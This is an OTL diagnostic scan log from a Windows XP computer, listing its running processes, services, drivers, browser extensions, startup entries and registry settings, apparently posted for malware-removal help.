Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 90 Days
Output = Standard
Quick Scan

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2010/05/13 20:31:33 | 000,570,880 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
PRC - [2010/05/13 00:16:26 | 000,049,321 | ---- | M] (The Pidgin developer community) -- C:\Program Files\Pidgin\pidgin.exe
PRC - [2010/05/10 05:48:25 | 001,917,616 | ---- | M] (Emsi Software GmbH) -- C:\Program Files\a-squared Anti-Malware\a2service.exe
PRC - [2010/05/08 18:10:00 | 003,646,344 | ---- | M] (Emsi Software GmbH) -- C:\Program Files\Emsisoft Anti-Malware\a2guard.exe
PRC - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
PRC - [2010/04/28 18:33:24 | 005,350,912 | ---- | M] (DonationCoder.com) -- C:\Program Files\FindAndRunRobot\FindAndRunRobot.exe
PRC - [2010/04/01 11:26:20 | 003,939,704 | ---- | M] (Sysinternals - www.sysinternals.com) -- C:\Program Files\procexp.exe
PRC - [2010/04/01 05:16:20 | 000,357,696 | ---- | M] (DT Soft Ltd) -- C:\Program Files\DAEMON Tools Lite\DTLite.exe
PRC - [2010/03/30 11:16:16 | 001,820,040 | ---- | M] (LogMeIn Inc.) -- C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe
PRC - [2010/03/30 11:16:12 | 001,107,336 | ---- | M] (LogMeIn Inc.) -- C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
PRC - [2010/03/09 09:58:32 | 001,738,352 | ---- | M] (PeerBlock, LLC) -- C:\Program Files\PeerBlock\peerblock.exe
PRC - [2010/02/26 01:10:20 | 021,979,992 | ---- | M] () -- C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe
PRC - [2010/02/12 17:24:25 | 001,953,792 | ---- | M] () -- c:\Snort\bin\snort.exe
PRC - [2010/01/18 21:43:02 | 000,124,256 | ---- | M] (CANON INC.) -- C:\Program Files\Canon\Canon IJ Network Scan Utility\CNMNSUT.EXE
PRC - [2009/12/10 11:27:26 | 000,357,384 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\LGDevAgt.exe
PRC - [2009/12/10 11:25:16 | 003,203,080 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe
PRC - [2009/12/10 11:00:42 | 001,573,384 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe
PRC - [2009/12/10 11:00:32 | 000,522,760 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\Applets\LCDMedia.exe
PRC - [2009/12/10 11:00:12 | 000,676,360 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\Applets\LCDClock.exe
PRC - [2009/09/16 22:14:48 | 000,153,608 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\Gaming Software\LWEMon.exe
PRC - [2009/07/20 13:30:50 | 000,813,584 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\SetPoint.exe
PRC - [2009/07/10 13:42:32 | 000,055,824 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
PRC - [2008/04/14 06:42:20 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2008/04/14 06:42:16 | 000,389,120 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\cmd.exe


[color=#E56717]========== Modules (SafeList) ==========[/color]

MOD - [2010/05/13 20:31:33 | 000,570,880 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
MOD - [2010/05/10 05:47:53 | 000,212,896 | ---- | M] (Emsi Software GmbH) -- C:\Program Files\a-squared Anti-Malware\a2hooks32.dll
MOD - [2009/07/20 13:29:06 | 000,045,584 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\lgscroll.dll
MOD - [2009/07/20 13:25:46 | 000,017,424 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\IMHook.dll
MOD - [2009/07/20 13:25:22 | 000,064,016 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\GameHook.dll
MOD - [2009/07/12 02:12:06 | 000,632,656 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll
MOD - [2008/04/14 06:40:22 | 000,110,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\msscript.ocx


[color=#E56717]========== Win32 Services (SafeList) ==========[/color]

SRV - File not found [Disabled | Stopped] --  -- (AQLOPB)
SRV - [2010/05/10 05:48:25 | 001,917,616 | ---- | M] (Emsi Software GmbH) [Auto | Running] -- C:\Program Files\a-squared Anti-Malware\a2service.exe -- (a2AntiMalware)
SRV - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) [On_Demand | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Web Scanner)
SRV - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) [On_Demand | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Mail Scanner)
SRV - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) [Auto | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Antivirus)
SRV - [2010/03/30 11:16:12 | 001,107,336 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Program Files\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2009/12/24 17:02:30 | 000,311,568 | ---- | M] (IObit) [Disabled | Stopped] -- C:\Program Files\IObit\IObit Security 360\is360srv.exe -- (IS360service)
SRV - [2009/10/29 11:22:50 | 030,603,640 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2009/10/20 14:19:48 | 000,117,264 | ---- | M] (CACE Technologies, Inc.) [Disabled | Stopped] -- C:\Program Files\WinPcap\rpcapd.exe -- (rpcapd) Remote Packet Capture Protocol v.0 (experimental)
SRV - [2009/09/26 05:28:22 | 004,639,136 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)
SRV - [2009/08/05 23:48:42 | 000,704,864 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Family Safety\fsssvc.exe -- (fsssvc)
SRV - [2009/07/20 13:28:10 | 000,121,360 | ---- | M] (Logitech, Inc.) [Disabled | Stopped] -- C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
SRV - [2009/07/17 09:32:00 | 003,576,320 | ---- | M] (Native Instruments GmbH) [Disabled | Stopped] -- C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe -- (NIHardwareService)
SRV - [2006/12/09 01:17:32 | 000,061,440 | ---- | M] (Digidesign, A Division of Avid Technology, Inc.) [Disabled | Stopped] -- C:\Program Files\Digidesign\Drivers\MMERefresh.exe -- (DigiRefresh)
SRV - [2005/11/17 14:18:52 | 001,527,900 | ---- | M] (MAGIX®) [Disabled | Stopped] -- C:\Program Files\MAGIX\Common\Database\bin\fbserver.exe -- (FirebirdServerMAGIXInstance)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV - [2010/05/11 15:02:10 | 000,017,488 | ---- | M] (Windows (R) 2000 DDK provider) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\gdrv.sys -- (gdrv)
DRV - [2010/05/11 14:54:31 | 000,023,456 | ---- | M] (Phoenix Technologies) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\DrvAgent32.sys -- (DrvAgent32)
DRV - [2010/05/10 05:47:52 | 000,011,776 | ---- | M] (Emsi Software GmbH) [Kernel | System | Running] -- C:\Program Files\a-squared Anti-Malware\a2util32.sys -- (a2util)
DRV - [2010/05/10 05:47:51 | 000,071,008 | ---- | M] (Emsi Software GmbH) [File_System | On_Demand | Running] -- C:\Program Files\a-squared Anti-Malware\a2accx86.sys -- (a2acc)
DRV - [2010/05/10 05:47:50 | 000,039,576 | ---- | M] (Emsi Software GmbH) [File_System | System | Running] -- C:\Program Files\a-squared Anti-Malware\a2dix86.sys -- (a2injectiondriver)
DRV - [2010/05/06 16:39:23 | 000,046,672 | ---- | M] (ALWIL Software) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2010/05/06 16:39:00 | 000,164,048 | ---- | M] (ALWIL Software) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\aswSP.sys -- (aswSP)
DRV - [2010/05/06 16:34:27 | 000,023,376 | ---- | M] (ALWIL Software) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\aswRdr.sys -- (aswRdr)
DRV - [2010/05/06 16:33:59 | 000,100,432 | ---- | M] (ALWIL Software) [File_System | Auto | Running] -- C:\WINDOWS\system32\drivers\aswmon2.sys -- (aswMon2)
DRV - [2010/05/06 16:33:47 | 000,019,024 | ---- | M] (ALWIL Software) [File_System | Auto | Running] -- C:\WINDOWS\system32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2010/05/06 16:33:29 | 000,028,880 | ---- | M] (ALWIL Software) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\aavmker4.sys -- (Aavmker4)
DRV - [2010/04/09 13:16:50 | 000,016,472 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\pwdrvio.sys -- (pwdrvio)
DRV - [2010/04/09 13:16:46 | 000,011,104 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\pwdspio.sys -- (pwdspio)
DRV - [2010/04/03 18:55:31 | 010,232,128 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nv4_mini.sys -- (nv)
DRV - [2010/03/23 07:29:50 | 005,881,376 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
DRV - [2010/03/09 09:58:30 | 000,018,544 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Program Files\PeerBlock\pbfilter.sys -- (pbfilter)
DRV - [2010/02/14 01:13:11 | 000,691,696 | ---- | M] () [Kernel | Boot | Running] -- C:\WINDOWS\System32\Drivers\sptd.sys -- (sptd)
DRV - [2010/02/03 15:56:56 | 000,026,176 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\hamachi.sys -- (hamachi)
DRV - [2010/02/03 00:52:08 | 004,605,952 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ati2mtag.sys -- (ati2mtag)
DRV - [2010/01/28 10:25:05 | 000,058,600 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nvhda32.sys -- (NVHDA)
DRV - [2009/11/26 17:08:46 | 000,399,424 | ---- | M] (TASCAM) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\tascusb2.sys -- (TASCAM_US122144)
DRV - [2009/11/26 17:08:42 | 000,039,488 | ---- | M] (TASCAM) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\tscusb2a.sys -- (TASCAM_US144_MK2_WDM)
DRV - [2009/11/26 17:08:40 | 000,026,688 | ---- | M] (TASCAM) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\tscusb2m.sys -- (TASCAM_US144_MK2_MIDI)
DRV - [2009/11/23 18:37:18 | 000,014,856 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LGVirHid.sys -- (LGVirHid)
DRV - [2009/11/23 18:37:08 | 000,019,720 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV - [2009/11/17 19:17:00 | 001,395,800 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Monfilt.sys -- (Monfilt)
DRV - [2009/11/17 19:16:00 | 001,691,480 | ---- | M] (Creative) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Ambfilt.sys -- (Ambfilt)
DRV - [2009/10/20 14:19:44 | 000,050,704 | ---- | M] (CACE Technologies, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\npf.sys -- (NPF)
DRV - [2009/09/11 13:48:04 | 000,066,056 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmXlCore.sys -- (WmXlCore)
DRV - [2009/09/11 13:47:54 | 000,014,984 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmVirHid.sys -- (WmVirHid)
DRV - [2009/09/11 13:47:32 | 000,035,592 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmFilter.sys -- (WmFilter)
DRV - [2009/09/11 13:47:22 | 000,022,792 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmBEnum.sys -- (WmBEnum)
DRV - [2009/08/05 23:48:42 | 000,054,752 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\fssfltr_tdi.sys -- (fssfltr)
DRV - [2009/06/17 12:56:16 | 000,037,392 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LMouFilt.Sys -- (LMouFilt)
DRV - [2009/06/17 12:56:06 | 000,035,472 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LHidFilt.Sys -- (LHidFilt)
DRV - [2009/06/17 12:55:34 | 000,010,384 | ---- | M] (Logitech, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\LBeepKE.sys -- (LBeepKE)
DRV - [2009/04/08 02:46:22 | 000,189,968 | ---- | M] (Advanced Micro Devices, Inc) [Kernel | Boot | Running] -- C:\WINDOWS\system32\DRIVERS\ahcix86.sys -- (ahcix86)
DRV - [2008/04/13 23:06:06 | 000,144,384 | ---- | M] (Windows (R) Server 2003 DDK provider) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\hdaudbus.sys -- (HDAudBus)
DRV - [2008/02/27 12:49:00 | 000,003,840 | ---- | M] () [Kernel | System | Running] -- C:\WINDOWS\System32\Drivers\BANTExt.sys -- (BANTExt)
DRV - [2007/11/22 16:55:52 | 000,105,088 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\Rtenicxp.sys -- (RTLE8023xp)
DRV - [2007/07/20 19:40:10 | 000,084,992 | ---- | M] (ATI Research Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\AtiHdmi.sys -- (AtiHdmiService)
DRV - [2007/04/16 17:46:34 | 000,033,792 | ---- | M] (Advanced Micro Devices) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\AmdPPM.sys -- (AmdPPM)
DRV - [2006/12/08 22:50:34 | 000,011,776 | ---- | M] (Digidesign, A Division of Avid Technology, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\diginet.sys -- (DigiNet)
DRV - [2006/10/16 03:03:36 | 000,072,608 | ---- | M] (PACE Anti-Piracy, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\TPkd.sys -- (TPkd)
DRV - [2006/07/01 23:39:40 | 000,036,864 | ---- | M] (Advanced Micro Devices) [Kernel | System | Stopped] -- C:\WINDOWS\system32\drivers\AmdK8.sys -- (AmdK8)
DRV - [2006/03/14 07:22:00 | 000,090,176 | ---- | M] (SafeNet, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\System32\Drivers\SENTINEL.SYS -- (Sentinel)
DRV - [2005/09/23 22:18:32 | 000,171,520 | ---- | M] (Pinnacle Systems GmbH) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\MarvinBus.sys -- (MarvinBus)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]


IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]


FF - HKLM\software\mozilla\Mozilla Firefox 3.6\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2010/04/25 11:50:08 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2010/04/25 11:50:08 | 000,000,000 | ---D | M]

[2010/02/12 23:18:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Extensions
[2010/02/12 23:18:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\1qvyaz9p.default\extensions
[2010/05/13 17:16:35 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\Jody\extensions
[2010/02/13 00:21:01 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\Jody\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
[2010/02/13 00:21:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\Jody\extensions\personas@christopher.beard
[2010/05/12 10:46:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions
[2010/04/29 21:16:18 | 000,000,000 | ---D | M] (Weave Sync) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}
[2010/04/17 10:34:31 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
[2010/04/17 10:34:31 | 000,000,000 | ---D | M] (Easy Youtube Video Downloader) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{c0c9a2c7-2e5c-4447-bc53-97718bc91e1b}
[2010/05/01 10:18:47 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
[2010/04/09 19:14:24 | 000,000,000 | ---D | M] (Greasemonkey) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}
[2010/02/13 00:20:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\DeviceDetection@logitech.com
[2010/04/13 20:52:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\personas@christopher.beard
[2010/03/21 09:38:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\SkipScreen@SkipScreen
[2010/05/13 17:16:35 | 000,000,000 | ---D | M] -- C:\Program Files\Mozilla Firefox\extensions
[2010/04/20 16:41:04 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}
[2009/11/19 17:16:28 | 000,091,552 | ---- | M] (Coupons, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npCouponPrinter.dll
[2010/04/12 17:29:19 | 000,411,368 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npdeployJava1.dll
[2010/04/07 20:35:03 | 000,075,208 | ---- | M] (Foxit Software Company) -- C:\Program Files\Mozilla Firefox\plugins\npFoxitReaderPlugin.dll
[2009/11/19 17:16:29 | 000,091,552 | ---- | M] (Coupons, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npMozCouponPrinter.dll
[2007/03/09 19:16:44 | 000,189,496 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npyaxmpb.dll

O1 HOSTS File: ([2004/08/04 06:00:00 | 000,000,734 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O4 - HKLM..\Run: [a-squared] C:\Program Files\Emsisoft Anti-Malware\a2guard.exe (Emsi Software GmbH)
O4 - HKLM..\Run: [IJNetworkScanUtility] C:\Program Files\Canon\Canon IJ Network Scan Utility\CNMNSUT.EXE (CANON INC.)
O4 - HKLM..\Run: [Kernel and Hardware Abstraction Layer] C:\WINDOWS\KHALMNPR.Exe (Logitech, Inc.)
O4 - HKLM..\Run: [KernelFaultCheck]  File not found
O4 - HKLM..\Run: [Launch LCDMon] C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe (Logitech Inc.)
O4 - HKLM..\Run: [Launch LGDCore] C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe (Logitech Inc.)
O4 - HKLM..\Run: [Launch LgDeviceAgent] C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe (Logitech Inc.)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKLM..\Run: [MSConfig] C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [Start WingMan Profiler] C:\Program Files\Logitech\Gaming Software\LWEMon.exe (Logitech Inc.)
O4 - HKCU..\Run: [DAEMON Tools Lite] C:\Program Files\DAEMON Tools Lite\DTLite.exe (DT Soft Ltd)
O4 - HKCU..\Run: [PeerBlock] C:\Program Files\PeerBlock\peerblock.exe (PeerBlock, LLC)
O4 - HKCU..\Run: [Pidgin] C:\Program Files\Pidgin\pidgin.exe (The Pidgin developer community)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.)
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Dropbox.lnk = C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe ()
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Find And Run Robot.lnk = C:\Program Files\FindAndRunRobot\FindAndRunRobot.exe (DonationCoder.com)
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to procexp.lnk = C:\Program Files\procexp.exe (Sysinternals - www.sysinternals.com)
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutorun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8 - Extra context menu item: Add to &Evernote - C:\Program Files\Evernote\Evernote3.5\enbar.dll (Evernote Corporation)
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra Button: Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll (Evernote Corporation)
O9 - Extra 'Tools' menuitem : Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll (Evernote Corporation)
O15 - HKCU\..Trusted Domains: ketsujin.com ([fighterace] https in Trusted sites)
O15 - HKCU\..Trusted Domains: ketsujin.com ([primary] https in Trusted sites)
O15 - HKCU\..Trusted Domains: ketsujin.com ([update] https in Trusted sites)
O15 - HKCU\..Trusted Domains: ketsujin.com ([www] https in Trusted sites)
O15 - HKCU\..Trusted Domains: stormofaces.com ([www] https in Trusted sites)
O16 - DPF: {0D6709DD-4ED8-40CA-B459-2757AEEF7BEE} http://download.gigabyte.com.tw/object/Dldrv.ocx (Dldrv2 Control)
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab (Symantec AntiVirus scanner)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\Yinsthelper.dll (Installation Support)
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab (DLM Control)
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab (Symantec RuFSI Utility Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab (Java Plug-in 1.6.0_20)
O16 - DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab (Java Plug-in 1.6.0_20)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab (Java Plug-in 1.6.0_20)
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} http://download.mcafee.com/molbin/iss-loc/mcfscan/2,2,0,5894/mcfscan.cab (McFreeScan Class)
O18 - Protocol\Handler\belarc {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files\Belarc\Advisor\System\BAVoilaX.dll (Belarc, Inc.)
O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
O18 - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - Reg Error: Key error. File not found
O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
